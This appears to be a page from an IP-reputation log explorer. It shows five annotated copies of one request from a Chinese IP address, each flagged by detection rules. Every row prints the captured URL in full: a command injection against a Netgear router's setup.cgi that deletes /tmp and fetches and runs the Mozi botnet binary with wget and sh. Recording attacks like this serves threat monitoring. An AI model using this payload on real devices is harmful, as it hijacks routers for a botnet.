DigitalOcean Referral Badge
cloud1
cloud2
cloud3
cloud4
cloud5
cloud6
← Back to IP report

Log Explorer

Fact drill-down for 27.43.206.166
Risk 2 LOW Scope All time All-time facts 5 In-scope 5 Filtered 5 Seen 2024-02-152024-02-15
Active (none) Clear
Faceted filters (facts-based) exact core + snapshot + optional start/end
Annotation facets
HTTP facets
Snapshot facets
Custom time window (optional override)
Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.
Tip: keep windows tight when you need speed, but the default is fact-complete.
Top annotators (facts, in-scope)
Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 1 — total 5 rows
#1 2024-02-15 02:48:05 event 1055575 GET 301 bytes 169
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
referer
-
UA
-
summary
event observed
details
subnet
27.43.206.0/24
asn
17816 — China Unicom IP network China169 Guangdong province
geo
China, Guangdong, Guangzhou
org
#2 2024-02-15 02:48:05 event 1055575 GET 301 bytes 169
ann ua 8 label ua
Annotation facts
label
ua
rule
ua:very_short
conf
65.00
details
Short/generic UAs are common in basic scripts and commodity automation.
More (full fields + snapshot) expand
url
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
referer
-
UA
-
summary
Very short User-Agent string
details
Short/generic UAs are common in basic scripts and commodity automation.
subnet
27.43.206.0/24
asn
17816 — China Unicom IP network China169 Guangdong province
geo
China, Guangdong, Guangzhou
org
#3 2024-02-15 02:48:05 event 1055575 GET 301 bytes 169
ann sfp 36 label sensitive_file
Annotation facts
label
sensitive_file
rule
sfp:param:cmd
conf
86.00
details
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/ne'
More (full fields + snapshot) expand
url
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
referer
-
UA
-
summary
Command-style parameter observed
details
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/ne'
subnet
27.43.206.0/24
asn
17816 — China Unicom IP network China169 Guangdong province
geo
China, Guangdong, Guangzhou
org
#4 2024-02-15 02:48:05 event 1055575 GET 301 bytes 169
ann cmdi 28 label cmdi
Annotation facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='tup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget http://192.168.1.1:8088/Mozi.m -O /tmp/netgear;sh netgear&c'
More (full fields + snapshot) expand
url
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
referer
-
UA
-
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='tup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget http://192.168.1.1:8088/Mozi.m -O /tmp/netgear;sh netgear&c'
subnet
27.43.206.0/24
asn
17816 — China Unicom IP network China169 Guangdong province
geo
China, Guangdong, Guangzhou
org
#5 2024-02-15 02:48:05 event 1055575 GET 301 bytes 169
ann cmdi 30 label cmdi
Annotation facts
label
cmdi
rule
cmdi:param_plus_cmd
conf
90.00
details
Suspicious command parameter combined with a recognized command token. Snippet='tup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget http://192.168.1.1:8088/Mozi.m -O /tmp/netgear;sh netgear&c'
More (full fields + snapshot) expand
url
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
referer
-
UA
-
summary
Command/file-injection indicator: cmdi:param_plus_cmd
details
Suspicious command parameter combined with a recognized command token. Snippet='tup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget http://192.168.1.1:8088/Mozi.m -O /tmp/netgear;sh netgear&c'
subnet
27.43.206.0/24
asn
17816 — China Unicom IP network China169 Guangdong province
geo
China, Guangdong, Guangzhou
org